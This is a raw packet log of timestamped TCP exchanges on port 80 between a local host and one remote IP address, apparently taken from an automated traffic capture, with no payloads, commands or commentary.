Jul 23, 2021 22:24:24.975096941 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.975147009 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.975178003 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.975210905 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.975240946 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.975250959 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.975261927 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.975267887 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.975276947 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.975281954 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.975285053 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.975289106 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.975291967 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.975295067 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.975297928 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.975298882 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.975331068 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.975339890 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.975358009 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.975385904 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.975394011 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.975413084 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.975446939 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.975449085 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.975476980 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.975502968 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.975516081 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.975531101 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.975558996 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.975575924 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.975584030 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.975611925 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.975637913 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.975641012 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.975672007 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.975684881 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.975703955 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.975730896 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.975743055 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.975758076 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.975785971 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.975801945 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.975812912 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.975840092 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.975851059 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.975867033 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.975900888 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.975903988 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.975931883 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.975960016 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.975977898 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.990278959 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.990319014 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.990351915 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.990372896 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.990375996 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.990400076 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.990401030 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.990434885 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.990456104 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.990467072 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.990493059 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.990508080 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.990520954 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.990549088 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.990570068 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.990592957 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.990622997 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.990633965 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.990653992 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.990683079 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.990695953 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.990712881 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.990741968 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.990765095 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.990771055 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.990808010 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.990808964 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.991911888 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.991956949 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.991983891 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.991997004 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.992029905 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.992047071 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.992065907 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.992110014 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.992111921 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.992183924 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.992222071 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.992232084 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.992252111 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.992275953 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.992312908 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.995757103 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.995798111 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.995827913 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.995836020 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.995870113 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.995881081 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.995899916 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.995929956 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.995934010 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.995959997 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.995992899 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.995995998 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.996032953 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.996071100 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.996073008 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.996117115 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.996150970 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.996150970 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.996181011 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.996211052 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.996216059 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.996239901 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.996268034 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.996296883 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.996300936 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.996326923 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.996326923 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.996364117 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.996402025 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.996411085 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.996443987 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.996490955 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.997088909 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.997127056 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.997159004 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.997165918 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.997189045 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.997217894 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.997229099 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.997248888 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.997276068 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.997284889 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.997306108 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.997334957 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.997340918 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.997375011 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.997410059 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.997417927 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.997452021 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.997481108 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.997494936 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.997510910 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.997539043 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.997549057 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.997567892 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.997596979 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.997610092 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:25.000339031 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:25.000380039 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:25.000407934 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:25.000411034 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:25.000437021 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:25.000447989 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:25.000466108 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:25.000495911 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:25.000509977 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:25.000524998 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:25.000554085 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:25.000581026 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:25.000590086 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:25.000626087 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:25.000632048 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:25.007002115 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:25.007052898 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:25.007080078 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:25.007097006 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:25.007141113 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:25.007172108 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:25.007221937 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:25.007266998 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:25.007276058 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:25.007324934 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:25.007371902 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:25.007411957 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:25.007416964 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:25.007461071 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:25.007464886 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:25.007508993 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:25.007544994 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:25.007577896 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:25.007616997 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:25.007632971 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:25.007644892 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:25.007675886 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:25.007678032 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:25.007705927 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:25.007713079 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:25.007744074 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:25.007761002 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:25.007783890 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:25.007821083 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:25.007826090 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:25.007852077 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:25.007884026 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:25.007896900 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:25.007915974 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:25.007946968 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:25.007961988 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:25.007977962 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:25.008009911 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:25.008021116 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:25.008049011 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:25.008084059 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:25.008100986 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:25.008116007 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:25.008147001 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:25.008168936 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:25.008318901 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:25.008409977 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:25.008702040 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:25.008832932 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:25.008882046 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:25.008944035 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:25.009005070 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:25.009047985 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:25.009144068 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:25.009665966 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:25.009713888 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:25.010180950 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:25.010257006 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:25.010303974 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:25.010360956 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:25.010489941 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:25.010539055 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:25.010571957 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:25.010608912 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:25.010639906 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:25.010664940 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:25.010703087 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:25.010741949 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:25.010746956 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:25.010777950 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:25.010816097 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:25.010828972 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:25.010854959 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:25.010890007 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:25.010894060 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:25.010927916 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:25.010966063 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:25.010968924 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:25.011013031 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:25.011056900 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:25.011058092 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:25.011091948 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:25.011153936 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:25.011162996 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:25.011192083 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:25.011230946 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:25.011244059 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:25.011267900 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:25.011306047 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:25.011307001 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:25.011343002 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:25.011383057 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:25.011389971 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:25.011431932 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:25.011470079 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:25.011472940 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:25.011507034 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:25.011544943 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:25.011557102 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:25.011580944 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:25.011635065 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:25.011646986 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:25.011672974 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:25.011712074 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:25.011724949 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:25.011751890 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:25.011790037 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:25.011802912 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:25.011838913 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:25.011881113 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:25.011884928 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:25.011919022 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:25.011956930 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:25.011959076 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:25.011996031 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:25.012032986 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:25.012038946 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:25.012070894 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:25.012108088 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:25.012115002 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:25.012156010 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:25.012197971 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:25.012201071 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:25.012236118 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:25.012274027 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:25.012279034 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:25.012312889 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:25.012357950 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:25.012368917 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:25.012396097 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:25.012434006 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:25.012456894 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:25.012482882 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:25.012525082 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:25.012531996 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:25.012562990 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:25.012600899 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:25.012604952 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:25.012638092 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:25.012675047 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:25.012679100 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:25.012732029 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:25.012773037 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:25.012782097 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:25.012819052 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:25.012861967 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:25.012892962 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:25.012898922 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:25.012944937 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:25.012945890 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:25.012995958 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:25.013046980 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:25.013053894 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:25.013096094 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:25.013148069 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:25.013174057 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:25.013211966 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:25.013262987 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:25.013273001 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:25.013324022 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:25.013379097 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:25.013384104 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:25.013433933 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:25.013484001 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:25.013489962 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:25.013545990 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:25.013597965 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:25.013659000 CEST	80	49750	45.144.225.135	192.168.2.4
